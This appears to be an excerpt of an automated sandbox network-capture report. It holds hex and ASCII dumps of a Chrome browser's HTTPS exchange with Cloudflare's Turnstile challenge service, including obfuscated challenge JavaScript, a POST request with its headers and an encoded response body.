                                                                                                                                                                                                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69
                                                                                                                                                                                                                                            Data Ascii: ile_feedback_report":"Having%20trouble%3F","turnstile_footer_terms":"Terms","turnstile_timeout":"Timed%20out","turnstile_verifying":"Verifying...","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20si
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 2c 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 35 33 38 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 38 37 38 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 34 38 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 31 35 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 31 30 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 36 32 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 33 32 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32
                                                                                                                                                                                                                                            Data Ascii: ,fY,ga,gg,gh,gi,gs,gD,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(538))/1*(parseInt(gI(878))/2)+-parseInt(gI(1148))/3+parseInt(gI(615))/4+-parseInt(gI(510))/5+-parseInt(gI(862))/6+parseInt(gI(1732))/7*(-parseInt(gI(12
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 74 70 76 61 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 72 44 59 59 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 6a 58 4e 77 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6e 63 5a 4f 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 62 75 4f 4e 49 27 3a 68 72 28 31 32 36 39 29 2c 27 54 54 4e 72 4d 27 3a 68 72 28 34 32 39 29 2c 27 66 50 47 71 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 54 4e 68 59 51 27 3a 68 72 28 31 32 37 35 29 2c 27 79 42 4b 50 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d
                                                                                                                                                                                                                                            Data Ascii: tpvas':function(h,i){return h<<i},'rDYYx':function(h,i){return h&i},'jXNwb':function(h,i){return i==h},'ncZOa':function(h,i){return h-i},'buONI':hr(1269),'TTNrM':hr(429),'fPGqZ':function(h,i){return h==i},'TNhYQ':hr(1275),'yBKPN':function(h,i){return h>i}
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 68 75 28 31 33 37 37 29 5d 28 30 29 2c 43 3d 30 3b 38 3e 43 3b 4b 3d 64 5b 68 75 28 35 35 34 29 5d 28 64 5b 68 75 28 31 37 32 39 29 5d 28 4b 2c 31 29 2c 31 2e 32 32 26 50 29 2c 64 5b 68 75 28 37 33 36 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 68 75 28 35 36 39 29 5d 28 64 5b 68 75 28 31 30 31 37 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 20 69 66 28 68 75 28 39 36 36 29 21 3d 3d 68 75 28 39 36 36 29 29 53 3d 46 5b 68 75 28 31 36 34 38 29 5d 28 68 75 28 31 35 36 32 29 2c 68 75 28 36 31 36 29 29 2c 53 5b 68 75 28 31 37 32 37 29 5d 28 27 64 27 2c 78 29 2c 30 3d 3d 3d 6a 3f 53 5b 68 75 28 31 37 32 37 29 5d 28 42 5b 68
                                                                                                                                                                                                                                            Data Ascii: )),K=0):L++,C++);for(P=F[hu(1377)](0),C=0;8>C;K=d[hu(554)](d[hu(1729)](K,1),1.22&P),d[hu(736)](L,o-1)?(L=0,J[hu(569)](d[hu(1017)](s,K)),K=0):L++,P>>=1,C++);}else if(hu(966)!==hu(966))S=F[hu(1648)](hu(1562),hu(616)),S[hu(1727)]('d',x),0===j?S[hu(1727)](B[h
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 67 5d 5b 30 5d 2b 2b 29 2c 31 30 32 29 2c 32 35 36 29 26 32 35 35 2c 64 5b 68 75 28 36 34 35 29 5d 28 32 31 33 2c 46 29 3f 28 56 3d 31 32 37 2e 33 5e 54 2c 57 3d 74 79 70 65 6f 66 20 74 68 69 73 2e 68 5b 64 5b 68 75 28 31 33 32 34 29 5d 28 31 35 38 2e 39 31 5e 55 2c 74 68 69 73 2e 67 29 5d 29 3a 78 3d 3d 3d 37 36 3f 28 56 3d 54 5e 31 31 35 2c 57 3d 2d 74 68 69 73 2e 68 5b 31 34 38 5e 55 5e 74 68 69 73 2e 67 5d 29 3a 64 5b 68 75 28 36 34 35 29 5d 28 31 32 37 2c 6a 29 3f 28 56 3d 54 5e 31 37 34 2e 36 36 2c 57 3d 2b 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 28 31 39 30 5e 55 29 5d 29 3a 4d 3d 3d 3d 33 37 3f 28 56 3d 31 34 33 5e 54 2c 57 3d 21 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 28 55 5e 32 32 31 2e 39 31 29 5d 29 3a 73 3d 3d 3d 32 31 37 26 26 28 56 3d
                                                                                                                                                                                                                                            Data Ascii: g][0]++),102),256)&255,d[hu(645)](213,F)?(V=127.3^T,W=typeof this.h[d[hu(1324)](158.91^U,this.g)]):x===76?(V=T^115,W=-this.h[148^U^this.g]):d[hu(645)](127,j)?(V=T^174.66,W=+this.h[this.g^(190^U)]):M===37?(V=143^T,W=!this.h[this.g^(U^221.91)]):s===217&&(V=
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 31 32 37 39 29 5d 5b 68 77 28 31 36 34 36 29 5d 28 6d 2c 27 2a 27 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 68 78 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4e 2c 50 2c 51 2c 52 2c 4d 29 7b 66 6f 72 28 68 78 3d 68 72 2c 73 3d 7b 27 4e 65 56 69 50 27 3a 68 78 28 31 32 37 39 29 2c 27 43 46 53 71 55 27 3a 64 5b 68 78 28 34 31 36 29 5d 2c 27 4f 49 50 69 68 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 29 7b 72 65 74 75 72 6e 20 4f 28 29 7d 7d 2c 78 3d 5b 5d 2c 42 3d 34 2c 43 3d 34 2c 44 3d 33 2c 45 3d 5b 5d 2c 48 3d 64 5b 68 78 28 31 31 39 31 29 5d 28 6f 2c 30 29 2c 49 3d 6a 2c 4a 3d 31 2c 46 3d 30 3b 64 5b 68 78 28 31 33 31 37 29 5d 28 33 2c 46 29 3b 78 5b 46 5d 3d 46 2c 46 2b 3d 31 29 3b 66 6f 72 28
                                                                                                                                                                                                                                            Data Ascii: 1279)][hw(1646)](m,'*')})},'i':function(i,j,o,hx,s,x,B,C,D,E,F,G,H,I,J,K,L,N,P,Q,R,M){for(hx=hr,s={'NeViP':hx(1279),'CFSqU':d[hx(416)],'OIPih':function(O){return O()}},x=[],B=4,C=4,D=3,E=[],H=d[hx(1191)](o,0),I=j,J=1,F=0;d[hx(1317)](3,F);x[F]=F,F+=1);for(
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 3d 6f 28 4a 2b 2b 29 29 2c 4b 7c 3d 64 5b 68 78 28 31 32 37 37 29 5d 28 64 5b 68 78 28 32 37 37 29 5d 28 30 2c 4d 29 3f 31 3a 30 2c 47 29 2c 47 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4e 3d 4b 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 68 78 28 31 31 39 34 29 5d 28 32 2c 38 29 2c 47 3d 31 3b 47 21 3d 4c 3b 4d 3d 48 26 49 2c 49 3e 3e 3d 31 2c 49 3d 3d 30 26 26 28 49 3d 6a 2c 48 3d 6f 28 4a 2b 2b 29 29 2c 4b 7c 3d 28 64 5b 68 78 28 37 31 32 29 5d 28 30 2c 4d 29 3f 31 3a 30 29 2a 47 2c 47 3c 3c 3d 31 29 3b 78 5b 43 2b 2b 5d 3d 65 28 4b 29 2c 4e 3d 43 2d 31 2c 42 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 68 78 28 31 31 39 34 29 5d 28 32 2c 31 36 29 2c 47 3d 31 3b 4c 21 3d 47 3b 4d
                                                                                                                                                                                                                                            Data Ascii: =o(J++)),K|=d[hx(1277)](d[hx(277)](0,M)?1:0,G),G<<=1);switch(N=K){case 0:for(K=0,L=Math[hx(1194)](2,8),G=1;G!=L;M=H&I,I>>=1,I==0&&(I=j,H=o(J++)),K|=(d[hx(712)](0,M)?1:0)*G,G<<=1);x[C++]=e(K),N=C-1,B--;break;case 1:for(K=0,L=Math[hx(1194)](2,16),G=1;L!=G;M
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 65 4d 5b 69 63 28 31 32 36 36 29 5d 28 63 29 2c 69 3d 5b 5d 2c 67 3d 2d 31 3b 21 66 5b 69 63 28 31 35 34 31 29 5d 28 69 73 4e 61 4e 2c 6b 3d 63 5b 69 63 28 31 33 37 37 29 5d 28 2b 2b 67 29 29 3b 69 5b 69 63 28 35 36 39 29 5d 28 53 74 72 69 6e 67 5b 69 63 28 33 32 39 29 5d 28 66 5b 69 63 28 31 33 35 39 29 5d 28 66 5b 69 63 28 31 33 31 34 29 5d 28 66 5b 69 63 28 37 34 34 29 5d 28 6b 2c 32 35 35 29 2d 68 2c 66 5b 69 63 28 31 33 35 39 29 5d 28 67 2c 36 35 35 33 35 29 29 2b 36 35 35 33 35 2c 32 35 35 29 29 29 29 3b 72 65 74 75 72 6e 20 69 5b 69 63 28 31 36 34 39 29 5d 28 27 27 29 7d 2c 66 77 3d 7b 7d 2c 66 77 5b 67 4a 28 33 38 34 29 5d 3d 27 6f 27 2c 66 77 5b 67 4a 28 31 30 34 30 29 5d 3d 27 73 27 2c 66 77 5b 67 4a 28 31 34 32 32 29 5d 3d 27 75 27 2c 66 77 5b
                                                                                                                                                                                                                                            Data Ascii: eM[ic(1266)](c),i=[],g=-1;!f[ic(1541)](isNaN,k=c[ic(1377)](++g));i[ic(569)](String[ic(329)](f[ic(1359)](f[ic(1314)](f[ic(744)](k,255)-h,f[ic(1359)](g,65535))+65535,255))));return i[ic(1649)]('')},fw={},fw[gJ(384)]='o',fw[gJ(1040)]='s',fw[gJ(1422)]='u',fw[
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 4f 62 6a 65 63 74 5b 69 6c 28 31 37 33 38 29 5d 28 68 29 2c 6b 3d 30 3b 6b 3c 6a 5b 69 6c 28 31 31 36 35 29 5d 3b 6b 2b 2b 29 69 66 28 6c 3d 6a 5b 6b 5d 2c 27 66 27 3d 3d 3d 6c 26 26 28 6c 3d 27 4e 27 29 2c 67 5b 6c 5d 29 7b 66 6f 72 28 6d 3d 30 3b 6d 3c 68 5b 6a 5b 6b 5d 5d 5b 69 6c 28 31 31 36 35 29 5d 3b 2d 31 3d 3d 3d 67 5b 6c 5d 5b 69 6c 28 33 38 35 29 5d 28 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 26 26 28 69 5b 69 6c 28 37 35 38 29 5d 28 66 43 2c 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 7c 7c 67 5b 6c 5d 5b 69 6c 28 35 36 39 29 5d 28 27 6f 2e 27 2b 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 29 2c 6d 2b 2b 29 3b 7d 65 6c 73 65 20 67 5b 6c 5d 3d 68 5b 6a 5b 6b 5d 5d 5b 69 6c 28 33 39 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 6e 7d 29 7d
                                                                                                                                                                                                                                            Data Ascii: Object[il(1738)](h),k=0;k<j[il(1165)];k++)if(l=j[k],'f'===l&&(l='N'),g[l]){for(m=0;m<h[j[k]][il(1165)];-1===g[l][il(385)](h[j[k]][m])&&(i[il(758)](fC,h[j[k]][m])||g[l][il(569)]('o.'+h[j[k]][m])),m++);}else g[l]=h[j[k]][il(397)](function(n){return'o.'+n})}


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            144192.168.2.1749956104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1345087052:1736511132:9pUcYqZrWbbHpnfn5qQ_UbKx0b4hCOzXHinJW-FbhBw/8ffcb89d1f3defa1/qdboioj1nzs.qKQ2IGA2i7DiVRCgVnxvzNdYE4uMfkM-1736512675-1.1.1.1-w8jZba1V.DYVKzlxhgfgquKi9isi8IRagts8fZYqLVNPs8x4jdIPsX2NIiP90oRo HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 3157
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            CF-Challenge: qdboioj1nzs.qKQ2IGA2i7DiVRCgVnxvzNdYE4uMfkM-1736512675-1.1.1.1-w8jZba1V.DYVKzlxhgfgquKi9isi8IRagts8fZYqLVNPs8x4jdIPsX2NIiP90oRo
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6ghio/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC3157OUTData Raw: 76 5f 38 66 66 63 62 38 39 64 31 66 33 64 65 66 61 31 3d 57 35 56 58 7a 58 47 58 6a 58 6c 58 69 68 50 51 68 50 44 58 68 49 54 4f 33 39 49 50 36 68 75 75 50 4b 74 50 54 4a 58 68 6e 50 30 58 54 56 39 54 55 6e 56 50 6d 45 6e 50 53 6f 68 32 57 50 70 58 68 44 56 50 54 66 46 35 38 5a 50 66 4f 50 76 50 68 35 50 66 56 43 4a 50 74 50 38 4a 54 75 50 4f 4a 45 56 50 6a 57 6f 38 39 36 4a 46 43 5a 33 47 50 57 6a 61 44 77 50 36 6e 6f 50 61 50 48 31 2d 4b 6e 50 42 6d 25 32 62 50 55 58 54 47 63 50 70 51 2b 4d 61 50 54 63 4f 50 68 34 50 57 56 6b 77 57 31 39 6d 45 34 6b 63 73 38 32 67 42 61 55 4e 4e 33 75 50 48 4d 35 75 74 54 42 50 42 79 6f 77 76 7a 63 41 58 38 74 4d 4b 79 4f 50 68 6f 50 4e 71 76 58 54 31 35 50 59 6b 2d 59 41 47 4f 49 75 50 50 32 34 45 4f 50 34 31 59 30 53
                                                                                                                                                                                                                                            Data Ascii: v_8ffcb89d1f3defa1=W5VXzXGXjXlXihPQhPDXhITO39IP6huuPKtPTJXhnP0XTV9TUnVPmEnPSoh2WPpXhDVPTfF58ZPfOPvPh5PfVCJPtP8JTuPOJEVPjWo896JFCZ3GPWjaDwP6noPaPH1-KnPBm%2bPUXTGcPpQ+MaPTcOPh4PWVkwW19mE4kcs82gBaUNN3uPHM5utTBPByowvzcAX8tMKyOPhoPNqvXT15PYk-YAGOIuPP24EOP41Y0S
                                                                                                                                                                                                                                            2025-01-10 12:37:57 UTC751INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:37:57 GMT
                                                                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 153100
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cf-chl-gen: tYwv0p9KFNbartroONDjgClLMmIOKtbS2dI/xfLLimZmzOIxlXKXpGc+tlWVbam1DUG7K7GDuTGxxZtcd/FD51nsizYPgjpnDCFFhQMggLfjMqrxX9xOz5gBKYzuFASNvC1GWr9469jY7/d4X1FJ9Vw/c1zh6cJ8tVUil6MOZPzI5b7VIwf4zCcjEbJ3FSM0Oa0T1r45/DlBPjGsye6VyNXwNO8sBgX80jx1VjKcs9xZ5sx5cjL2VkR1cESmYLNdBwF3Gjp+bj+xN8V3aYcqeg6RbO+Geo9UtQls6W7gZtXUwZCkeEO/ZAkGTfnmKHfS/75+qa2HL2XaaTuWEqgCEx4ZausC1OJ8iXl/k4rJMnl5TiCCchYpL7dTfPuVrWs2cMhF2/LSakyGazojon/rKEMNha7qEIWuI2iY/vPRqbGodtnmXSbmCUuX6OttI5X0g+mZbrnaeMJCqmiivNyTtUb0M2vhI23CpAkX1YU1yKk=$0Rt2ijWQsjh+d+8MEWQR2A==
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb8a79e346a5b-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:37:57 UTC618INData Raw: 73 4a 42 78 64 70 6d 5a 75 6f 69 59 74 4a 71 35 76 63 43 52 6d 4c 57 71 78 36 61 39 6e 35 79 4d 79 35 79 7a 6b 70 37 46 6f 72 53 6a 31 64 47 55 72 35 7a 58 32 72 36 2f 6f 35 72 53 32 2b 50 61 35 72 36 64 32 64 58 50 75 4f 4c 4f 71 2f 44 4c 78 2b 66 6c 30 62 48 6f 73 66 4c 49 38 4d 66 32 2f 50 72 59 37 4f 37 41 31 4f 62 78 77 75 77 47 39 64 7a 50 2b 67 7a 4d 41 77 63 4a 31 66 55 49 44 78 58 35 44 42 4c 76 2b 75 30 56 44 4f 30 66 45 65 38 42 39 39 2f 67 42 78 2f 6e 48 50 6f 64 43 6a 49 68 35 76 51 41 49 68 59 4b 46 51 77 77 44 68 6b 49 49 44 77 68 45 6b 41 2f 51 54 41 71 48 79 63 6a 42 51 51 4d 51 53 63 4e 52 69 56 43 54 78 5a 48 45 45 67 36 53 78 6c 4c 56 46 73 63 54 44 49 39 5a 6c 64 49 56 6a 74 41 4e 69 52 67 58 47 35 64 4c 6b 68 30 55 6b 39 31 4c 7a 46
                                                                                                                                                                                                                                            Data Ascii: sJBxdpmZuoiYtJq5vcCRmLWqx6a9n5yMy5yzkp7ForSj1dGUr5zX2r6/o5rS2+Pa5r6d2dXPuOLOq/DLx+fl0bHosfLI8Mf2/PrY7O7A1ObxwuwG9dzP+gzMAwcJ1fUIDxX5DBLv+u0VDO0fEe8B99/gBx/nHPodCjIh5vQAIhYKFQwwDhkIIDwhEkA/QTAqHycjBQQMQScNRiVCTxZHEEg6SxlLVFscTDI9ZldIVjtANiRgXG5dLkh0Uk91LzF
                                                                                                                                                                                                                                            2025-01-10 12:37:57 UTC1369INData Raw: 64 63 5a 6e 36 42 54 59 2b 4a 67 33 53 49 52 33 65 57 67 48 71 43 65 6c 53 55 6a 59 6c 76 59 58 32 43 6c 31 35 76 6b 4b 47 4a 69 33 5a 38 6c 33 2b 6f 6d 49 75 6a 68 49 79 32 70 36 53 56 68 4b 36 54 68 6f 32 6f 6a 72 57 4c 76 37 53 33 73 71 61 52 78 70 6d 68 69 72 32 6d 77 71 47 71 79 59 6a 4f 74 5a 43 4d 71 39 53 57 31 4a 6d 33 6d 71 61 52 7a 70 33 42 6c 62 48 51 34 65 4f 34 78 65 6d 38 76 71 76 62 78 63 2f 6a 79 71 6e 54 76 63 6d 2f 38 63 76 54 30 50 66 61 36 65 75 36 76 64 7a 43 75 74 30 45 33 64 4c 56 35 2b 4c 36 35 64 37 50 2f 67 7a 6a 7a 65 62 75 79 42 55 56 37 50 62 37 37 2b 76 73 48 75 6e 74 46 4e 37 76 38 66 49 41 2b 66 63 69 44 41 44 37 41 53 37 35 2f 53 6a 75 41 41 49 4e 45 41 6f 49 4e 42 77 51 44 42 4d 2b 43 67 35 44 2f 68 41 53 48 69 41 61 47
                                                                                                                                                                                                                                            Data Ascii: dcZn6BTY+Jg3SIR3eWgHqCelSUjYlvYX2Cl15vkKGJi3Z8l3+omIujhIy2p6SVhK6Tho2ojrWLv7S3sqaRxpmhir2mwqGqyYjOtZCMq9SW1Jm3mqaRzp3BlbHQ4eO4xem8vqvbxc/jyqnTvcm/8cvT0Pfa6eu6vdzCut0E3dLV5+L65d7P/gzjzebuyBUV7Pb77+vsHuntFN7v8fIA+fciDAD7AS75/SjuAAINEAoINBwQDBM+Cg5D/hASHiAaG
                                                                                                                                                                                                                                            2025-01-10 12:37:57 UTC1369INData Raw: 71 59 6d 74 4b 55 48 64 50 6d 59 35 52 6a 33 47 46 64 6c 47 4c 63 33 57 64 63 57 42 39 65 70 52 38 6b 34 4f 61 61 6d 53 50 67 34 53 72 6a 71 46 77 73 34 4f 72 71 5a 75 61 72 62 35 32 6b 36 6d 66 66 48 32 78 76 72 2b 42 6b 5a 47 32 6f 5a 6d 6e 6a 4d 69 6d 6d 59 32 6c 6f 4c 44 52 6a 61 65 6b 70 63 2b 72 74 38 7a 67 74 4b 71 2f 30 37 71 2b 73 72 61 31 74 4f 6d 64 74 63 69 6e 74 2b 33 67 77 2f 4b 38 34 66 44 7a 38 2f 6a 49 39 4d 72 4d 2f 64 50 34 39 75 44 58 31 39 62 76 35 4d 44 36 41 77 6a 4a 44 51 38 41 2b 63 37 77 2f 41 6b 52 45 76 67 50 30 64 67 51 47 52 72 76 47 68 7a 33 44 51 44 74 4a 41 48 79 45 67 44 6c 4b 50 72 36 48 75 63 75 37 51 51 42 44 69 51 7a 4e 76 67 48 4c 51 72 37 4e 78 37 78 48 54 67 42 49 44 59 47 46 79 45 57 47 6b 45 6d 42 43 4d 70 4b 78
                                                                                                                                                                                                                                            Data Ascii: qYmtKUHdPmY5Rj3GFdlGLc3WdcWB9epR8k4OaamSPg4SrjqFws4OrqZuarb52k6mffH2xvr+BkZG2oZmnjMimmY2loLDRjaekpc+rt8zgtKq/07q+sra1tOmdtcint+3gw/K84fDz8/jI9MrM/dP49uDX19bv5MD6AwjJDQ8A+c7w/AkREvgP0dgQGRrvGhz3DQDtJAHyEgDlKPr6Hucu7QQBDiQzNvgHLQr7Nx7xHTgBIDYGFyEWGkEmBCMpKx
                                                                                                                                                                                                                                            2025-01-10 12:37:57 UTC1369INData Raw: 61 31 47 49 6c 47 35 37 62 4a 70 74 57 6d 43 55 64 49 4f 59 66 70 74 2f 6d 48 4f 68 71 61 4f 46 73 4b 57 46 68 33 2b 53 69 62 61 56 70 48 71 72 65 5a 65 2f 66 5a 79 64 6e 38 46 39 67 59 54 43 70 70 75 66 76 34 61 36 6f 37 66 46 79 64 50 49 6f 63 58 41 79 37 54 53 6c 4b 6d 36 32 63 79 70 71 73 7a 4d 72 4a 72 65 31 4c 6d 30 33 39 53 36 74 39 2f 57 71 4f 6a 79 33 2b 6d 78 79 4f 6e 79 34 63 72 37 2b 4f 72 56 7a 39 33 65 38 73 33 36 74 76 76 51 7a 77 63 43 78 39 6b 4f 32 67 45 4b 2b 4f 6b 55 7a 41 59 4f 36 78 55 58 47 42 66 34 47 39 6a 33 32 2f 6e 59 34 50 6a 39 42 69 59 41 4a 65 59 4d 49 53 6b 62 48 69 67 44 44 4f 6a 7a 4c 7a 51 4d 4e 2f 45 6c 2b 44 51 70 50 68 30 7a 51 41 38 75 4d 68 4d 64 50 44 34 59 47 52 34 36 47 68 31 4a 49 43 67 66 4c 52 77 71 49 31 51
                                                                                                                                                                                                                                            Data Ascii: a1GIlG57bJptWmCUdIOYfpt/mHOhqaOFsKWFh3+SibaVpHqreZe/fZydn8F9gYTCppufv4a6o7fFydPIocXAy7TSlKm62cypqszMrJre1Lm039S6t9/WqOjy3+mxyOny4cr7+OrVz93e8s36tvvQzwcCx9kO2gEK+OkUzAYO6xUXGBf4G9j32/nY4Pj9BiYAJeYMISkbHigDDOjzLzQMN/El+DQpPh0zQA8uMhMdPD4YGR46Gh1JICgfLRwqI1Q
                                                                                                                                                                                                                                            2025-01-10 12:37:57 UTC1369INData Raw: 4a 52 30 6a 49 36 64 6a 35 4b 56 67 59 5a 6d 69 70 4f 63 6c 32 52 70 71 34 71 73 62 34 2b 6d 6f 59 57 42 63 35 43 51 70 35 75 2b 6e 6f 74 37 71 37 75 31 77 71 5a 39 6c 4b 48 4a 6d 4a 69 6d 6d 71 57 39 75 71 72 4a 68 71 6a 4d 7a 62 50 4c 31 72 79 56 31 39 72 48 74 72 6d 71 74 4e 33 58 76 62 48 46 31 61 61 38 78 37 2f 71 70 39 7a 42 73 62 36 71 38 2b 57 31 34 76 44 78 37 72 72 57 33 4d 6b 43 7a 50 49 44 35 64 63 45 35 72 38 4c 36 76 7a 59 79 51 58 68 36 78 49 48 41 38 33 66 46 52 58 34 43 52 73 50 32 50 66 63 46 42 76 75 47 68 49 63 41 67 51 44 4b 53 49 46 48 2b 6a 6e 42 51 34 68 43 51 66 37 36 7a 55 49 4c 50 4d 34 39 68 66 32 4e 44 73 57 4c 55 41 69 4c 69 4d 78 47 54 49 36 48 45 49 4a 4a 52 74 46 4f 6b 4d 65 52 51 38 4f 50 68 59 6b 4e 31 49 4e 52 31 4a 66
                                                                                                                                                                                                                                            Data Ascii: JR0jI6dj5KVgYZmipOcl2Rpq4qsb4+moYWBc5CQp5u+not7q7u1wqZ9lKHJmJimmqW9uqrJhqjMzbPL1ryV19rHtrmqtN3XvbHF1aa8x7/qp9zBsb6q8+W14vDx7rrW3MkCzPID5dcE5r8L6vzYyQXh6xIHA83fFRX4CRsP2PfcFBvuGhIcAgQDKSIFH+jnBQ4hCQf76zUILPM49hf2NDsWLUAiLiMxGTI6HEIJJRtFOkMeRQ8OPhYkN1INR1Jf
